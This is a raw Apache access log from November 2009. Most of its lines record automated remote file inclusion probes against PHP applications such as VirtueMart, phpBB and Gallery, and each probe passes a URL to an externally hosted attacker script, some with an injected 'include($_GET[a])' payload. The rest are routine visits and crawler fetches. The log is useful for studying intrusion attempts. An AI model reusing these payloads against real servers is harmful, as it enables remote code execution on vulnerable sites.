91.202.253.13 - - [01/Nov/2009:01:43:24 -0500] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:01:43:24 -0500] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.808"
61.47.7.71 - - [01/Nov/2009:01:43:41 -0500] "GET /logs/access_log.Q109101500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.47.7.71 - - [01/Nov/2009:01:43:41 -0500] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.47.7.71 - - [01/Nov/2009:01:43:41 -0500] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.202.253.13 - - [01/Nov/2009:01:43:41 -0500] "GET /logs/access_log.Q109052500//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:01:43:41 -0500] "GET /logs/access_log.Q109052500//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.808"
61.47.7.71 - - [01/Nov/2009:01:43:47 -0500] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:44:03 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:44:03 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:44:03 -0500] "GET /logs/access_log.Q109051500%20%20//init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:44:05 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:44:05 -0500] "GET /logs/access_log.Q109051500%20%20//init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:44:05 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:44:10 -0500] "GET /logs/access_log.Q109081400%20%20//init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
64.191.64.213 - - [01/Nov/2009:01:44:10 -0500] "GET //index.php?lg=http://www.baltimorecrashpads.com/zen_cart//images/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.191.64.213 - - [01/Nov/2009:01:44:10 -0500] "GET /logs//index.php?lg=http://www.baltimorecrashpads.com/zen_cart//images/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.191.64.213 - - [01/Nov/2009:01:44:11 -0500] "GET /logs/access_log.Q109081300%20%20//index.php?lg=http://www.baltimorecrashpads.com/zen_cart//images/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:44:12 -0500] "GET /logs/access_log.Q109081400%20%20//init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
75.56.202.182 - - [01/Nov/2009:01:44:18 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L313442504050A10076FA062+M37+ENG HTTP/1.1" 200 47007 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
75.56.202.182 - - [01/Nov/2009:01:44:20 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
75.56.202.182 - - [01/Nov/2009:01:44:37 -0500] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L313442504050A10076FA062+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
75.56.202.182 - - [01/Nov/2009:01:44:48 -0500] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L313442504050A10076FA062+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
75.56.202.182 - - [01/Nov/2009:01:44:49 -0500] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
75.56.202.182 - - [01/Nov/2009:01:44:49 -0500] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
75.56.202.182 - - [01/Nov/2009:01:44:50 -0500] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
75.56.202.182 - - [01/Nov/2009:01:44:50 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
75.56.202.182 - - [01/Nov/2009:01:44:53 -0500] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L313442504050A10076FA062+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
75.56.202.182 - - [01/Nov/2009:01:44:53 -0500] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L313442504050A10076FA062+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
75.56.202.182 - - [01/Nov/2009:01:44:59 -0500] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L313442504050A10076FA062+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
75.56.202.182 - - [01/Nov/2009:01:45:00 -0500] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
75.56.202.182 - - [01/Nov/2009:01:45:00 -0500] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
75.56.202.182 - - [01/Nov/2009:01:45:03 -0500] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
75.56.202.182 - - [01/Nov/2009:01:45:03 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
77.222.40.234 - - [01/Nov/2009:01:45:25 -0500] "GET /logs/access_log.Q109101500%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.222.40.234 - - [01/Nov/2009:01:45:25 -0500] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.202.253.13 - - [01/Nov/2009:01:45:47 -0500] "GET /logs/access_log.Q109101500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:01:45:47 -0500] "GET /logs/access_log.Q109101500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:01:45:47 -0500] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:01:45:48 -0500] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:01:45:48 -0500] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:01:45:48 -0500] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
121.78.116.203 - - [01/Nov/2009:01:46:10 -0500] "GET //includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:46:11 -0500] "GET /logs//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:46:11 -0500] "GET /logs/access_log.Q109052000//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:46:11 -0500] "GET /logs/error_log.Q109052000//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
91.202.253.13 - - [01/Nov/2009:01:47:06 -0500] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:01:47:06 -0500] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
209.59.12.99 - - [01/Nov/2009:01:48:11 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.47.7.71 - - [01/Nov/2009:01:49:01 -0500] "GET /logs/access_log.Q109101500%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:01:49:19 -0500] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:01:49:19 -0500] "GET /logs/error_log.Q109071800%20%20//galeria.php?start=0&kategoria=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
67.195.110.164 - - [01/Nov/2009:01:49:36 -0500] "GET /logs/error_log.Q109101100 HTTP/1.0" 200 3906870 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
61.47.7.71 - - [01/Nov/2009:01:49:39 -0500] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.149.216.70 - - [01/Nov/2009:01:49:41 -0500] "GET //includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
62.149.216.70 - - [01/Nov/2009:01:49:41 -0500] "GET /logs//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
62.149.216.70 - - [01/Nov/2009:01:49:41 -0500] "GET /logs/access_log.Q109052000//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:49:47 -0500] "GET /logs/access_log.Q109080400%20%20//init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:49:47 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:49:47 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:49:48 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:49:48 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:49:48 -0500] "GET /logs/access_log.Q109080400%20%20//init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:49:48 -0500] "GET /logs/access_log.Q109081400%20%20//init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:49:56 -0500] "GET /logs/access_log.Q109052000%20%20//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:01:49:56 -0500] "GET /logs/error_log.Q109052000%20%20//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:49:58 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:49:58 -0500] "GET /logs/access_log.Q109080400%20%20//init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:49:58 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:49:58 -0500] "GET /logs/access_log.Q109081400%20%20//init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.223.201.177 - - [01/Nov/2009:01:50:07 -0500] "GET /logs/access_log.Q109081400%20%20//init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
67.195.110.164 - - [01/Nov/2009:01:49:38 -0500] "GET /logs/error_log.Q109101100 HTTP/1.0" 200 3906870 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
219.127.87.143 - - [01/Nov/2009:01:50:45 -0500] "GET /logs/kontakt.phpphpbb_root_path=%20http://dynastyfashionhouse.com/images/as.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
219.127.87.143 - - [01/Nov/2009:01:50:45 -0500] "GET /kontakt.phpphpbb_root_path=%20http://dynastyfashionhouse.com/images/as.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
91.202.253.13 - - [01/Nov/2009:01:51:25 -0500] "GET /logs/access_log.Q109052000//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:01:51:25 -0500] "GET //includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:01:51:26 -0500] "GET /logs//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:01:51:29 -0500] "GET /logs/access_log.Q109052000//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:01:51:29 -0500] "GET //includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:01:51:30 -0500] "GET /logs//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
220.80.108.81 - - [01/Nov/2009:01:51:35 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:01:51:35 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:01:51:35 -0500] "GET /logs/access_log.Q109062200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
91.202.253.13 - - [01/Nov/2009:01:51:58 -0500] "GET /logs/error_log.Q109052000//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.808"
91.202.253.13 - - [01/Nov/2009:01:51:59 -0500] "GET /logs/error_log.Q109052000//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.808"
195.13.191.76 - - [01/Nov/2009:01:52:29 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://0pop.com/id.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
209.59.12.99 - - [01/Nov/2009:01:53:11 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.80.108.81 - - [01/Nov/2009:01:53:21 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:01:53:21 -0500] "GET /logs/access_log.Q109062200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:01:53:21 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.223.143.131 - - [01/Nov/2009:01:53:32 -0500] "GET /logs/help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
74.223.143.131 - - [01/Nov/2009:01:53:32 -0500] "GET /logs/access_log.Q109093000%20%20/help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.223.143.131 - - [01/Nov/2009:01:53:32 -0500] "GET /help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
195.13.191.76 - - [01/Nov/2009:01:53:35 -0500] "GET /logs/error_log.Q109082100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://0pop.com/id.txt? HTTP/1.1" 404 283 "-" "libwww-perl/5.803"
74.223.143.131 - - [01/Nov/2009:01:53:42 -0500] "GET /logs/error_log.Q109081300%20%20/help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
213.79.101.98 - - [01/Nov/2009:01:54:06 -0500] "GET //includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
213.79.101.98 - - [01/Nov/2009:01:54:06 -0500] "GET /logs/error_log.Q109052000//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
213.79.101.98 - - [01/Nov/2009:01:54:06 -0500] "GET /logs//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
213.79.101.98 - - [01/Nov/2009:01:54:06 -0500] "GET /logs/access_log.Q109052000//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
67.195.110.164 - - [01/Nov/2009:01:54:08 -0500] "GET /logs/error_log.Q109102400 HTTP/1.0" 200 3884810 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
220.80.108.81 - - [01/Nov/2009:01:54:16 -0500] "GET /logs/access_log.Q109052300//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
67.195.110.164 - - [01/Nov/2009:01:53:23 -0500] "GET /logs/access_log.Q109102000 HTTP/1.0" 200 6621560 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.78.116.203 - - [01/Nov/2009:01:54:42 -0500] "GET /logs/access_log.Q109051500//init_basic.php?GALLERY_BASEDIR=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
67.195.110.164 - - [01/Nov/2009:01:54:09 -0500] "GET /logs/error_log.Q109102400 HTTP/1.0" 200 3884810 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
